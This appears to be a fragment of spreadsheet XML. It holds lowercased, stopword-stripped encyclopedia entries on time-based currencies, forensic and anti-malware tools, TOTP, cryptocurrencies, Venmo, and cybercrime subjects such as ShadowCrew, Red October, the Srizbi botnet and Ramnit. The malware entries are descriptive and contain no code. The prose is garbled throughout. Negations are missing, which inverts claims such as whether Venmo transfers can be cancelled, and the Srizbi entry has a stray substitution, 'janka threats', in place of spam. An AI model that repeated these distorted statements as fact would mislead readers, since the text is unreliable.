    <t>economics, time-based currency alternative currency exchange system unit account person-hour time unit. some time-based currencies value everyone's contributions equally: hour equals service credit. systems, person volunteers work hour another person; thus, credited hour, redeem hour service another volunteer. others time units might fractions hour (e.g. minutes, minutes units/hour, minutes units/hour). while time-based exchange systems service exchanges exchange involves provision services measured time unit, also possible exchange goods 'pricing' terms average national hourly wage rate (e.g. average hourly rate $20/hour, commodity valued national currency would equivalent hour). history 19th century time-based currency exchanges date back early 19th century. cincinnati time store (1827-1830) first series retail stores created american individualist anarchist josiah warren test economic labor theory value. experimental store operated 1827, 1830. cincinnati time store experiment labor medium exchange antedated similar european efforts decades.the national equitable labour exchange founded robert owen, welsh socialist labor reformer london, england, 1832. established birmingham, england, folding 1834. issued "labour notes" similar banknotes, denominated units hours. john gray, socialist economist, worked owen later ricardian socialists postulated national chamber commerce central bank issuing labour currency.in 1848, socialist first self-designated anarchist pierre-joseph proudhon postulated system time chits. josiah warren published book describing labor notes 1852.in 1875, karl marx wrote "labor certificates" (arbeitszertifikaten) critique gotha program "certificate society [the labourer] furnished amount labour", used draw "from social stock means consumption much costs amount labour." 20th century after criticizing incoherency capitalist, leninist, trotskyist justifications wage differentials 1949 socialisme barbarie text translated “the relations production russia” first volume political social writings http://libcom.org/files/cc_psw_v1.pdf, political activist philosopher cornelius castoriadis, responding hungarian revolution 1956, advocated workers “proclaim abolition work norms instaurate full equality wages salaries” 1957 socialisme barbarie text translated content socialism, second volume political social writings http://libcom.org/files/cc_psw_v2.pdf. (see also “the hour work” section content socialism, iii,” third volume: http://libcom.org/files/cc_psw_v3.pdf.) elaborated advocacy “absolute equality wages incomes” 1974 text, "hierarchy salaries incomes," also third volume: http://libcom.org/files/cc_psw_v3.pdf, “today” section (starting page “done done” (1989), fifth volume castoriadis’s crossroads labyrinth series: http://www.notbored.org/cornelius-castoriadis-crossroads-5-done-and-to-be-done.pdf edgar cahn coined term "time dollars" time dollars: currency that enables americans turn their hidden resource-time-into personal security community renewal, book co-authored jonathan rowe 1992. also went trademark terms "timebank" "time credit".timebanking community development tool works facilitating exchange skills experience within community. aims build 'core economy' family community valuing rewarding work done world's first timebank started japan teruko mizushima 1973 idea participants could earn time credits could spend time lives. based bank simple concept hour time given services others could earn reciprocal hours services giver stage future, particularly might need most. 1940s, mizushima already foreseen emerging problems ageing society seen today. 1990s movement took edgar cahn pioneering there, united kingdom, martin simon timebanking david boyle, brought london-based economics foundation (nef). paul glover created ithaca hours 1991. each hour valued hour basic labor $10.00. professionals entitled charge multiple hours hour, often reduced rate spirit equity. millions dollars' worth hours traded among thousands residents businesses. interest-free hour loans made, hour grants given community organizations.the first british time bank opened 1998 stroud, national charity membership organisation, timebanking started 2002. 21st century according edgar cahn, timebanking roots time "money social programs [had] dried dominant approach social service u.s. coming creative ways solve problem. would later write "americans face least three interlocking sets problems: growing inequality access bottom basic goods services; increasing social problems stemming need rebuild family, neighborhood community; growing disillusion public programs designed address problems" "the crisis support efforts address social problems stems directly failure piecemeal efforts rebuild genuine community." particular cahn focused top-down attitude prevalent social services. believed major failings many social service organizations unwillingness enroll help people trying help. called deficit based approach social service, organizations view people trying help terms needs, opposed asset based approach, focuses contributions towards communities everyone make. theorized system like timebanking could "[rebuild] infrastructure trust caring strengthen families communities." hoped system "would enable individuals communities become self-sufficient, insulate vagaries politics capacity individuals effect relegated scrap heap dismissed freeloaders."as philosophy, timebanking, also known time trade founded upon five principles, known timebanking's core values: everyone asset some work beyond monetary price reciprocity helping community (via social networks) necessary respect human beingsideally, timebanking builds community. timebank members sometimes refer return simpler times community individuals. interview timebank gorbals neighbourhood glasgow revealed following sentiment: [the time bank] involves everybody coming together community gorbals never—not long time—had community spirit. back, years ago, community spirit, areas, people even chap next door sugar that's think project's doing, trying bring back, community sense 2017 nimses offered concept time-based currency nim. minute life. concept first adopted eastern europe. concept based idea universal basic income. every person issuer nims. every minute one's life, created, spent sent another person, like money. time dollars time dollars tax-exempt complementary currency used means providing mutual credit timebanking. they typically called "time credits" "service credits" outside united states. timebank members exchange services time dollars. each exchange recorded corresponding credit debit accounts participants. hour time worth time dollar, regardless service provided hour much skill required perform task hour. this "one-for-one" system relies abundant resource designed recognize encourage reciprocal community service, resist inflation, avoid hoarding, enable trade, encourage cooperation among participants. timebanks timebanks established countries, least timebanks established states throughout united kingdom. timebanks also significant presence japan, south korea, zealand, taiwan, senegal, argentina, israel, greece, spain. timebanks used reduce recidivism rates diversionary programs first-time juvenile offenders; facilitate re-entry ex-convicts; deliver health care, training social services public housing complexes; facilitate substance abuse recovery; prevent institutionalization severely disabled children parental support networks; provide transportation homebound seniors rural areas; deliver elder care, community health services hospice care; foster women's rights initiatives senegal. timebanking timebanking pattern reciprocal service exchange uses units time currency. example complementary monetary system. timebank, also known service exchange, community practices time banking. unit currency, always valued hour's worth person's labor, used groups various names generally known time credit (formerly time dollar us). timebanking primarily used provide incentives rewards work mentoring children, caring elderly, neighborly—work usually done volunteer basis—which pure market system devalues. essentially, "time" spends providing types community services earns "time" spend receive services. well gaining credits, participating individuals, particularly used recipients parts lives, potentially gain confidence, social contact skills giving others. communities, therefore, time banking tool forge stronger intra-community connections, process known "building social capital". timebanking intellectual genesis early 1980s. 1990, robert wood johnson foundation invested us$1.2 million pilot time banking context senior care. today, countries active timebanks. there timebanks active timebanks u.s. timebanking timebank timebank members earn credit time dollars hour spend helping members community. services offered members timebanks include: child care, legal assistance, language lessons, home repair, respite care caregivers, among things. time dollars time credits earned recorded timebank accessed desired. timebank theoretically simple paper, system originally intended take advantage computer databases record keeping. some timebanks employ paid coordinator keep track transactions match requests services provide them. other timebanks select member group members handle tasks. various organizations provide specialized software help local timebanks manage exchanges. organizations also often offer consulting services, training, materials individuals organizations looking start timebanks own.example services offered timebank members mission individual timebank influences exactly services offered. places, timebanking adopted means strengthen community whole. other timebanks oriented towards social service, systems change, helping underprivileged groups. timebanks, acknowledged goals. time credit time credit fundamental unit exchange timebank, equal hour person's labor. traditional timebanks, hour person's time equal hour another's. time credits earned providing services spent receiving services. upon earning time credit, person need spend right away: save indefinitely. however, since value time credit fixed hour, resists inflation earn interest. ways intentionally designed differ traditional fiat currency used countries. consequently, little good hoard time credits and, practice, many timebanks also encourage donation excess time credits community pool spent need community events. criticisms some criticisms timebanking focused time credit's inadequacies form currency market information mechanism. frank fisher predicted 1980s currency "would lead kind distortion market forces crippled russia's economy."dr. gill seyfang's study gorbals timebank—one studies timebanking done academic community—listed several non-theoretical problems timebanking. first difficulty communicating potential members exactly makes timebanking different, "getting people understand difference timebanking traditional volunteering." also notes guarantee every person's needs provided timebank dint fact supply certain skills lacking community.one stringent criticisms timebanking organizational sustainability. while member-run timebanks relatively overhead costs exist, others staff keep organization running. this quite expensive smaller organizations without long-term source funding, fold. timebanking around world timebanking first british time bank opened 1998 stroud, gloucestershire. timebanking tbuk, founded 2002 social activist martin simon, inspired growth timebanking usa. tbuk charity membership organisation providing advice, resources, software training anyone wants community time bank, develop existing one, learn timebanking. tbuk also advocates timebanking government policy level, supports organisations wish incorporate asset-based approach practice. march 2021, almost million hours exchanged tbuk members, time banks throughout isle wight stanley perthshire. global timebanking 2013 timerepublik launched first global timebank. eliminate geographical limitations previous timebanks. since 2015 timerepublik promoting time banking within local governments, municipalities, universities, large companies. 2017 timerepublik first prize global innovation awards innovation human capital category community exchange system (ces) global network communities using alternative exchange systems, many timebanks. timebanks trade wherever are, well mutual credit exchanges. system uses base 'currency' hour, conversion rates different exchange groups based national average hourly wage rates. this allows timebanks trade mutual credit exchanges different countries. studies examples elderplan elderplan social incorporated timebanking promote active, engaged lifestyles older members. funding "social" part social hmos since dried much program cut, height, members able portions premiums time credits (back called time dollars) instead hard currency. idea encourage older people become engaged communities also help often "[foster] dignity allowing people contribute services well receive them." gorbals timebank study 2004, gill seyfang published study community development journal effects timebank located gorbals area glasgow, scotland, inner-city estate characterized high levels deprivation, poverty, unemployment, poor health educational attainment." gorbals timebank local charity intent combat social ills face region. seyfang concluded timebank effective "building community capacity" "promoting social inclusion." highlights timebank's success "[re-stitching] social fabric gorbals." "[boosting] engagement existing projects activities" variety projects including community safety network, library, healthy living project, theatre. writes "the timebank enabled people access help otherwise would without," help included home repair, gardening, funeral, tuition paid time credits continuing education course. timebank florianópolis time bank city florianópolis (btf) first best known time banks brazil. initiative conceived september 2015 local zeitgeist meeting, part international sustainability movement. works facebook group 20,000 members, exchanges counted spreadsheet shared users. scientific research indicates time bank means creating social capital local society members different socioeconomic characteristics compared residents city florianópolis. younger, non-white, employed, female individuals, working informal sector, higher education level higher monthly income likely members. spice timebank spice social enterprise developed time-based currency called time credits. spice works across health social care, housing, community development education, supporting organisations services time credits achieve outcomes. spice grew work wales institute community currencies former mining districts south wales, several studies done based spice timebank referenced timebank. 2016 survey, based 1000 members spice timebank, respondents said time credits positive impact quality life, reported learned skill reported less need doctor. also cincinnati time store collaborative finance community currency community exchange system (ces) coproduction public services service users communities fiscal localism labour theory value labour-time voucher local exchange trading system (lets) references further reading external links timebanking youtube</t>
  </si>
  <si>
    <t>The Sleuth Kit</t>
  </si>
  <si>
    <t>sleuth (tsk) library collection unix- windows-based utilities extracting data disk drives storage facilitate forensic analysis computer systems. forms foundation autopsy, better known tool essentially graphical user interface command line utilities bundled sleuth kit.the collection open source protected gpl, ipl. software active development supported team developers. initial development done brian carrier based coroner's toolkit. official successor platform.the sleuth capable parsing ntfs, fat/exfat, 1/2, ext2, ext3, ext4, hfs, 9660 yaffs2 file systems either separately within disk images stored (dd), expert witness formats. sleuth used examine microsoft windows, apple macintosh osx, many linux unix computers. sleuth used included command line tools, library embedded within separate digital forensic tool autopsy log2timeline/plaso. tools some tools included sleuth include: lists metadata entries, inode. blkls displays data blocks within file system (formerly called dls). lists allocated unallocated file names within file system. fsstat displays file system statistical information image storage medium. ffind searches file names point specified metadata entry. mactime creates timeline files based upon times. disk_stat (currently linux-only) discovers existence host protected area. applications sleuth used forensics, main purpose understanding data stored disk drive, even operating system removed meta data. recovering deleted image files summarizing deleted files search files name included keyword future historians dealing computer storage devices also autopsy (software) graphical user interface sleuth kit. caine linux includes sleuth references external links official website</t>
  </si>
  <si>
    <t>Time-based one-time password</t>
  </si>
  <si>
    <t>time-based one-time password (totp) computer algorithm generates one-time password (otp) uses current time source uniqueness. extension hmac-based one-time password algorithm (hotp), adopted internet engineering task force (ietf) standard 6238.totp cornerstone initiative open authentication (oath), used number two-factor authentication (2fa) systems. history through collaboration several oath members, totp draft developed order create industry-backed standard. complements event-based one-time standard hotp, offers user organizations enterprises choice selecting technologies best application requirements security guidelines. 2008, oath submitted draft version specification ietf. this version incorporates feedback commentary authors received technical community based prior versions submitted ietf. 2011, totp officially became 6238. algorithm establish totp authentication, authenticatee authenticator must pre-establish hotp parameters following totp parameters: unix time start counting time steps (default interval used calculate value counter (default seconds).both authenticator authenticatee compute totp value, authenticator checks whether totp value supplied authenticatee matches locally generated totp value. some authenticators allow values generated current time order account slight clock skews, network latency user delays. totp uses hotp algorithm, replacing counter non-decreasing value based current time: totp value(k) hotp value(k, ct), calculating counter value count number durations current time seconds since particular epoch, epoch specified seconds since unix epoch (e.g. using unix time, length time duration (e.g. seconds).unix time strictly increasing. when leap second inserted utc, unix time repeats second. single leap second cause integer part unix time decrease, non-decreasing well long multiple second. security unlike passwords, totp codes single-use, compromised credential valid limited time. however, users must enter totp codes authentication page, creates potential phishing attacks. short window totp codes valid, attackers must proxy credentials real time.totp credentials also based shared secret known client server, creating multiple locations secret stolen. attacker access shared secret could generate new, valid totp codes will. this particular problem attacker breaches large authentication database. also botan (programming library) freeotp google authenticator multiotp references external links step step python implementation jupyter notebook designing docker two-factor authentication, (section "using time-based one-time password (totp) authentication").</t>
  </si>
  <si>
    <t>RunScanner</t>
  </si>
  <si>
    <t>runscanner freeware microsoft windows system utility scans windows system configured running programs autostart locations. history program created "best worlds" effort combine positive features similar programs like hijackthis, autoruns silentrunners. unlike similar programs, runscanner connects online database rate good items. main purpose database whitelisting instead blacklisting. usage runscanner scans windows autostart locations gives user possibility delete misconfigured malware items. inexperienced users post files forums specialist helpers help solve malware problems. advanced users features modern malware fighters come expect. unlike similar software, runscanner also exchange binary files users. main features scanning 100+ hijack locations verification file signatures hash calculation files online malware analysis results extended filters item marking powerful process killer plain text logfile generation binary .run logfile generation hosts file editor also software malware targeted threat vulnerability (computing) references external links official site</t>
  </si>
  <si>
    <t>Shiba Inu (cryptocurrency)</t>
  </si>
  <si>
    <t>shiba token (ticker: shib) decentralized cryptocurrency created august 2020 anonymous person group known "ryoshi". named shiba (柴犬), japanese breed originating chūbu region, breed depicted dogecoin's symbol, originally satirical cryptocurrency based doge meme. shiba characterized "meme coin" pump dump scheme. there also concerns concentration coin single "whale" wallet controlling billions dollars' worth token, frenzied buying retail investors motivated fear missing (fomo).shiba created august 2020, dubbing 'dogecoin killer'. 2021, vitalik buterin donated trillion shib (worth billion time) india covid-crypto relief fund.in early october 2021, exchange price cryptocurrency notably surged. value increased 240% week. however, beginning november price dropped continued fall, ending month lost approximately value. also meme coin dogecoin references external links official website</t>
  </si>
  <si>
    <t>ShadowCrew</t>
  </si>
  <si>
    <t>shadowcrew cybercrime forum operated domain name shadowcrew.com august 2002 november 2004. origins concept shadowcrew developed early 2002 series chat sessions brett johnson (gollumfun), seth sanders (kidd), marvin taylor (macgayver). shadowcrew website also contained number sub-forums latest information hacking tricks, social engineering, credit card fraud, virus development, scams, phishing. organizational structure shadowcrew emerged early 2002 another underground site, counterfeitlibrary.com, brett johnson would followed carderplanet.com owned dmitry golubov a.k.a. script, website primarily russian language. site also facilitated sale drugs wholesale.during early years, site hosted overseas hong kong, shortly cumbajohnny (albert gonzalez)'s arrest, server possession somewhere jersey. aftermath legacy shadowcrew forerunner today's cybercrime forums marketplaces. structure, marketplace, review system, innovations began shadowcrew laid basis today's underground forums marketplaces. likewise, many today's current scams computer crimes began counterfeitlibrary shadowcrew. site flourished time opened 2002 demise late october 2004. even though site booming criminal activity seemed well, members know going behind scenes. federal agents received "big break" found cumbajohnny albert gonzalez. upon cumba's arrest, immediately turned started working federal agents. from april 2003 october 2004, cumba assisted gathering information monitoring site utilized started taking many russians hacking databases selling counterfeit credit cards. cumbajohnny long term police informant responsible teaching secret service monitor, trap arrest shadowcrew.the federal indictment says, "shadowcrew international organization approximately 4,000 members…" last available page october 2004 archive.org shows 2,709 registered members. people familiar shadowcrew forum, well known many members multiple user names. members banned forum would frequently register another user name well. lastly, forum around years possibly many inactive accounts. however, also need members develop name could trusted; possible idea registered users duplicates accurate.$4 million losses believed amount dealt forum. this figure arrived multiplying number credit cards transferred $500 federal monetary figure fraud case determined). this figure assumes every single card valid used. dollar figure quoted pertains evidence gathered employed members. actual dollar figure potentially much higher fact $500 card federal existence federal agents took site.shadowcrew admin brett johnson managed avoid arrested following 2004 raids, picked 2005 separate charges, turned informant secret service. continuing commit fraud informant, 'operation anglerphish' embedded him, dubbed secret service agents "the original internet godfather", admins scandinaviancarding cardersmarket. when continued carding activities exposed part separate investigation 2006, briefly went made united states most wanted list caught august year.in 2011, former bulgarian shadowcrew member aleksi kolarov a.k.a. finally arrested held paraguay extradited united states 2013 face charges.in 2019 released episode declassified: untold stories american spies detailing secret service investigation shadowcrew. also computer crime hacking internet forums organized crime russian mafia references external links archives shadowcrew.com shadowcrews complete forum archives 'shadowcrew indictment business week "hacker hunters" article another article business week mentions shadowcrew context e-gold</t>
  </si>
  <si>
    <t>SharpMusique</t>
  </si>
  <si>
    <t>sharpmusique rewrite pymusique (written python), programs itunes music store clients, allowing songs downloaded itunes music store without drm. pymusique pymusique written travis watkins, cody brocious, lech johansen purpose allowing downloading songs itunes music store applied mac, linux, windows computer. first released johansen's website march 2005. although itunes music store's method applying fairplay songs widely known, pymusique first program exploit loophole system, allowing users download songs without restriction. march 2005, apple released update rendered pymusique non-functional. day, version pymusique released worked again, without windows compatibility. march 2005, johansen released sharpmusique, windows-compatible port pymusique.pymusique also allowed songs re-downloaded free, case user accidentally deleted purchase. within number days, apple broke client forcing users upgrade itunes 4.9. response apple's actions, johansen released pymusique version march 2005 [1], allows users pymusique apple's store. with launch 0.4, developer cody brocious stated blog future versions pymusique would released microsoft windows support. sharpmusique september 2005, lech johansen released sharpmusique, written took pymusique left off. program kept updated version 1.0, point longer updated. itunes protocol changed, users sharpmusique able release primitive patches account changes mid-2006, protocol changed drastically. around time, without public announcement, download links sharpmusique source removed johansen's website. result, longer easily available. references external links forbes.com article cody brocious pymusique neowin.net interview cody brocious[broken link] sharpmusique links deep comments source packages linux windows</t>
  </si>
  <si>
    <t>Red October (malware)</t>
  </si>
  <si>
    <t>operation october october cyberespionage malware program discovered october 2012 uncovered january 2013 russian firm kaspersky lab. malware reportedly operating worldwide five years prior discovery, transmitting information ranging diplomatic secrets personal information, including mobile devices. primary vectors used install malware emails containing attached documents exploited vulnerabilities microsoft word excel. later, webpage found exploited known vulnerability java browser plugin. october termed advanced cyberespionage campaign intended target diplomatic, governmental scientific research organizations worldwide. extent operation released kaspersky "moscow-based antivirus firm uncovered campaign."after revealed, domain registrars hosting companies shut many domains, used virus creators receive information. attackers, themselves, shut operation, well. references external links info kaspersky.com</t>
  </si>
  <si>
    <t>Tor Mail</t>
  </si>
  <si>
    <t>mail hidden service went offline august 2013 raid freedom hosting. service allowed users send receive email anonymously, email addresses inside outside network. history mail provided mail access webmail applications choose from, fully functional ajax-based, simple client required javascript cookies. user could also access mail smtp, pop3 imap email client. user signed accessed mail hidden service needed software installed computer access hidden services. users required provide identifying information name address. mail's goal provide completely anonymous private communications anyone needed service providers said anonymous could forced reveal anything mail user. they also said service cooperate anyone attempting identify censor mail user. mail's service consisted several servers, hidden service, incoming outgoing internet facing mail servers. site's operators said data stored hard drive servers exim mail server software. emails, logs personal data stored servers, thus matter seized shut down." they claimed prepared quickly replace relay taken offline. service smtp/imap/pop3 hidden server completely separate relays. relays know address hidden service. 2013 javascript attack message appeared mail main page early august 2013, saying "down maintenance sorry, this server currently offline maintenance. please hours." since august 2013, service unavailable. disappearance mail linked arrest child pornography charges alleged operator freedom hosting, hosted large number .onion sites. september 2013, admitted court filing dublin taken freedom hosting.the following month, details emerged zero-day javascript attack, injected browser bundle based firefox javascript enabled default. javascript turned default updated versions browser bundle. however, used takedown, exploited send users' addresses windows computer names server virginia. january 2014 confirmed access mail servers.in january 2016, stated innocent tormail users also hacked fbi. also anonymous remailer .onion domain crypto-anarchism internet privacy references</t>
  </si>
  <si>
    <t>Srizbi botnet</t>
  </si>
  <si>
    <t>srizbi botnet considered world's largest botnets, responsible sending half spam sent major botnets combined. botnets consist computers infected srizbi trojan, sent spam command. srizbi suffered massive setback november 2008 hosting provider janka cartel taken down; global spam volumes reduced result action. size size srizbi botnet estimated around 450,000 compromised machines, estimation differences smaller among various sources. botnet reported capable sending around trillion janka threats day, half total approximately trillion janka threats sent every day. comparison, highly publicized storm botnet manages reach around total number spam sent peak periods.the srizbi botnet showed relative decline aggressive growth number spam messages sent mid-2008. july 2008, botnet believed responsible roughly spam net, sharp decline almost share may. origins earliest reports srizbi trojan outbreaks around june 2007, small differences detection dates across antivirus software vendors. however, reports indicate first released version already assembled march 2007. srizbi botnet experts considered second largest botnet internet. however, controversy surrounding kraken botnet. 2008, srizbi largest botnet. spread botnet composition srizbi botnet consists microsoft windows computers infected srizbi trojan horse. this trojan horse deployed onto victim computer mpack malware kit. past editions used "n404 exploit kit" malware spread, kit's usage deprecated favor mpack.the distribution malware kits partially achieved utilizing botnet itself. botnet known send spam containing links fake videos celebrities, include link pointing malware kit. similar attempts taken subjects illegal software sales personal messages. apart self-propagation, mpack also known much aggressive spreading tactics, notably compromise 10,000 websites june 2007. these domains, included surprising number pornographic websites, ended forwarding unsuspecting visitor websites containing mpack program. once computer becomes infected trojan horse, computer becomes known zombie, command controller botnet, commonly referred botnet herder. operation srizbi botnet based upon number servers control utilization individual bots botnet. these servers redundant copies other, protects botnet crippled case system failure legal action takes server down. reactor mailer server-side srizbi botnet handled program called "reactor mailer", python-based component responsible coordinating spam sent individual bots botnet. reactor mailer existed since 2004, currently third release, also used control srizbi botnet. software allows secure login allows multiple accounts, strongly suggests access botnet spam capacity sold external parties (software service). this reinforced evidence showing srizbi botnet runs multiple batches spam time; blocks addresses observed sending different types spam time. once user granted access, utilize software create message want send, test spamassassin score send users list email addresses. suspicion arisen writer reactor mailer program might person responsible srizbi trojan, code analysis shows code fingerprint matches programs. claim indeed true, coder might well responsible trojan behind another botnet, named rustock. according symantec, code used srizbi trojan similar code found rustock trojan, could well improved version latter. srizbi trojan srizbi trojan client side program responsible sending spam infected machines. trojan credited extremely efficient task, explains srizbi capable sending high volumes spam without huge numerical advantage number infected computers. apart efficient spam engine, trojan also capable hiding user system itself, including products designed remove trojan system. trojan fully executed kernel mode noted employ rootkit technologies prevent form detection. patching ntfs file system drivers, trojan make files invisible operating system human user utilizing system. trojan also capable hiding network traffic generates directly attaching ndis tcp/ip drivers process, feature currently unique trojan. this procedure proven allow trojan bypass firewall sniffer protection provided locally system.once place operational, contact hardcoded servers list carries this server supply file containing number files required start spamming business. following files identified downloaded: 000_data2 mail server domains 001_ncommall list names 002_senderna list possible sender names 003_sendersu list possible sender surnames config main spam configuration file message html message spam mlist recipients mail addresses mxdata record datawhen files received, first initialize software routine allows remove files critical revealing spam rootkit applications. after procedure done, trojan start sending spam message received control server. incidents srizbi botnet basis several incidents received media coverage. several notable ones described here. this means complete list incidents, list major ones. "ron paul" incident october 2007, several anti-spam firms noticed unusual political spam campaign emerging. unlike usual messages counterfeit watches, stocks, penis enlargement, mail contained promotional information united states presidential candidate paul. paul camp dismissed spam related official presidential campaign. spokesman told press: true, could done well-intentioned misguided supporter someone intentions trying embarrass campaign. either way, independent work, connection."the spam ultimately confirmed come srizbi network. through capture control servers involved, investigators learned spam message sent million email addresses 3,000 computers. spammer identified internet handle "nenastnyj" (ненастный, means "rainy" "foul", "rainy day, foul weather" russian); real identity determined. malicious spam tripling volumes week week june 2008 srizbi managed triple number malicious spam sent average 9.9%, largely effort. this particular spam wave aggressive attempt increase size srizbi botnet sending emails users warned videotaped naked. sending message, kind spam referred "stupid theme", attempt people click malicious link included mail, realizing message likely spam. while old, social engineering technique remains proven method infection spammers. size operation shows power monetary income botnet closely based upon spam capacity: infected computers translate directly greater revenue botnet controller. also shows power botnets increase size, mainly using part strength numbers. server relocation after removal control servers hosted mccolo late november 2008, control botnet transferred servers hosted estonia. this accomplished mechanism trojan horse queried algorithmically generated domain names, registered individuals controlling botnet. united states computer security firm fireeye, inc. kept system controllers' hands period weeks preemptively registering generated domain names position sustain effort. however spamming activity greatly reduced control server transfer. also references</t>
  </si>
  <si>
    <t>Vera Valor</t>
  </si>
  <si>
    <t>vera valor dual digital physical gold currency troy ounce face value ounce "four nine" purity fine gold. reverse side coin particular embedded code allows digital liquidity. history coin privately developed france released late 2011. since monnaie paris (paris mint) owns state monopoly minting coins endowed face value, coin designed face value troy ounce fine gold, unique serial number facilitate digital currency. obverse value indicates "vera valor" "ounce" written english, french, spanish, arabic chinese reverse side displays code unique coin. minted switzerland comparable chinese gold panda also e-gold liberty dollar wocu world currency references</t>
  </si>
  <si>
    <t>Venmo</t>
  </si>
  <si>
    <t>venmo american mobile payment service founded 2009 owned paypal since 2012. venmo aimed friends family wish split bills, e.g. movies, dinner, rent, event tickets etc. account holders transfer funds others mobile phone app; sender receiver must live united states. 2021 company handled $230 billion transactions generated $850 million revenue.by default, venmo publishes every peer-to-peer transaction (excluding amount), feature shown researchers reveal sensitive details users' lives situations. 2018, company settled federal trade commission several privacy security violations related features, made changes corresponding settings. however, venmo continued attract criticism exposing users possible privacy risks. history venmo founded andrew kortina iqram magdon-ismail, freshman roommates university pennsylvania. according kortina, initially inspired create transaction solution while, process helping start friend's yogurt shop, "realized horrible traditional point sales software was". local jazz show, kortina magdon-ismail conceived idea instantly buying show text message. finally, idea cemented magdon-ismail forgot wallet trip visit kortina. process settling debt considerable inconvenience, especially compared possibility mobile phone-based transactions. shortly after, began working send money mobile phones. their original prototype sent money text messages, eventually transitioned text messages smartphone app.in 2010, company raised $1.2 million seed money financing round ventures.in 2012, company acquired braintree $26.2 million.in december 2013, paypal acquired braintree $800 million.prior october 2015, venmo prohibited consumer-to-business transactions platform. january 2016, paypal announced venmo working select merchants would accept venmo payment. initial launch partners included munchery gametime. merchants accept paypal accept venmo. 2018, venmo's merchant product permit "selling goods services person"; however, research mobile payment trends among mom-and-pop restaurants york city month revealed grey market case whereby chinese takeouts food trucks used personal venmo codes accept payments customers. this payment behavior similar used chinese mobile applications wechat alipay within establishments.in october 2020, paypal announced venmo along paypal services allow users purchase cryptocurrencies like bitcoin, bitcoin cash, ethereum, litecoin select international markets starting first half 2021.on april 2021, venmo announced beginning roll ability buy, hold, sell cryptocurrencies using platform. however, selected users access feature estimated cryptocurrency transfers become available whole userbase 2021. products users create account mobile website provide basic information bank account information. must valid email address american mobile phone number venmo. recipients transactions found phone number, venmo username, email. users venmo balance used transactions. they link bank accounts, debit cards, credit cards, venmo account; alternatively users order venmo mastercard paying bank account debit card free, payments credit card transaction. some credit card providers charge cash advance fees venmo payments. user enough funds account making transaction, automatically withdraw necessary funds registered bank account card. when users first create account, total transactions cannot exceed $299.99 identity verified. after identity verified, users send $2,999.99 seven period.since 2008, cash transfers using venmo instantaneous could canceled initial transfer sent. like traditional wire transfers, take three business days become final. january 2018, paypal rolled instant transfer feature venmo, allowing users deposit funds debit cards typically within minutes. deducted amount transfer; $10, whichever less. standard bank transfer (typically completed within business days) available fee. venmo mastercard 2018, venmo released physical debit card available users. card runs mastercard network offers access overdraft protection. used anywhere accepts mastercard, enables $400 daily withdrawals, though transactions non-moneypass atms come least $2.50 withdrawal fees.in addition, service offers reload function, which, enabled, takes money user's linked checking account increments venmo balance drops cover purchase. customers could subject fees consequences bank overdraft account. card purchases show user's venmo transaction history, card canceled within app. these features make card similar traditional bank debit card, adds ability directly track spending in-app. social component privacy venmo includes social networking interaction; created friends could quickly split bills, whether movies, dinner, rent, tickets, etc. when user makes transaction, transaction details (stripped payment amount) shared user's "news feed" user's network friends. this mimics social media feed. there "world wide" venmo feed, "friends only" feed, personal feed. venmo encourages social interaction application comments using jokes emojis and/or likes. 2016, around approved venmo transactions included least emoji.early venmo required users sign facebook, made easy find peers wanted also provided venmo free marketing. users friends facebook, application allowed opportunity search username phone number. profiles personalized profile pictures, usernames venmo transaction history. transactions made private, users keep default change privacy settings. venmo either buyer seller protection.venmo includes three social feeds: public feed, friends feed, private feed. default, venmo transactions shared publicly. anyone opens public feed, including people venmo, publicly shared posts. privacy settings changed posts either shared user's venmo contacts, even kept private. posts shared contacts, still appear friends feed, whereas private transactions visible parties involved transaction. users involved single transaction differing privacy settings, venmo applies restrictive level. users override overall preference individual transaction, including transaction made. security venmo claimed security bank-grade, personal financial data encrypted protected secure servers guard unauthorized transactions. venmo uses encryption help protect user's account details stores information servers secure locations. web, "https:" lock next address user's signal encryption however, journalists, security researchers, california department business oversight (dbo) federal trade commission disputed claims.in february 2018, settled venmo, investigation uncovered false representations "bank grade" security failures comply gramm-leach-bliley safeguards rule privacy rule. under settlement, venmo would required undergo third-party audits every years following years. also complained venmo "misled consumers extent could control privacy transactions" misrepresented availability funds withdrawal.venmo states customers need worry security privacy, encourages users increase security. july 2018, guardian published article showing venmo insecure privacy protection default. according researcher found privacy issue, venmo publishes transactions along names openly world wide web. better business bureau reported scammers exploit cancellation period appear pay, ultimately avoid paying item.in november 2018, wall street journal reported venmo, first quarter 2018, suffered million operating losses—nearly budgeted for—due wave payments fraud". criticism controversies privacy concerns 2018 study analyzed million public transactions found venmo "reveals massive amount private details users' lives default". year, company reached settlement accused venmo "misleading" users privacy settings changes required make transactions completely private. 2019, another researcher downloaded analyzed seven million transactions, concluding although venmo made minor improvements limiting mass-scraping, data still users risk various forms cyber attacks.in 2019, mozilla electronic frontier foundation wrote open letter express deep concern venmo's disregard importance user privacy, call venmo make critical changes privacy settings: make transactions private default, give users privacy settings friend lists".venmo's social model attracted attention researchers. research group university washington observed social feed venmo differs social networks activity driven financial transactions. user could make trivial transaction make post (e.g., sending someone $0.01, requesting $0.02), participant studies reported ever this. further, neither reading feed sharing transaction memo publicly friends necessary send receive money.on venmo, people transact friends businesses app. analysis public transactions identifies spectrum patterns, regular users create transactions variety expenses, niche users venmo small cluster friends things (e.g., bills among roommates).a 2021 investigation buzzfeed news reportedly managed find venmo account united states president biden "less minutes looking it"; buzzfeed news additionally states venmo "leaves everyone world exposed" states reveals major privacy concern. consumer financial protection bureau probe venmo came scrutiny consumer financial protection bureau 2021 company's treatment customers owing money transactions. paypal, company operating venmo's platform, announced regulatory filing february received civil investigative demand cfpb "related venmo's unauthorized funds transfers collections processes, related matters." venmo history using aggressive tactics threaten debt-owing users, ranging seizing funds user's paypal accounts sending debt collectors users. customer service emails showed company notifying users could involve collection agency debts $3,000 according article 2019 wall street journal, instances even customer question scammed. such practices continued covid-19 pandemic. references external links official website</t>
  </si>
  <si>
    <t>Ramnit</t>
  </si>
  <si>
    <t>ramnit computer worm affecting windows users. estimated infected windows september december 2011. ramnit botnet dismantled europol symantec 2015. peak 2015, ramnit estimated infected 3,200,000 pcs. ramnit infects removable media drives also hides within master boot record. soon infects computer, copies attached removable drives. also searches infects files extensions .exe, .dll, .htm .html. references</t>
  </si>
  <si>
    <t>Ven (currency)</t>
  </si>
  <si>
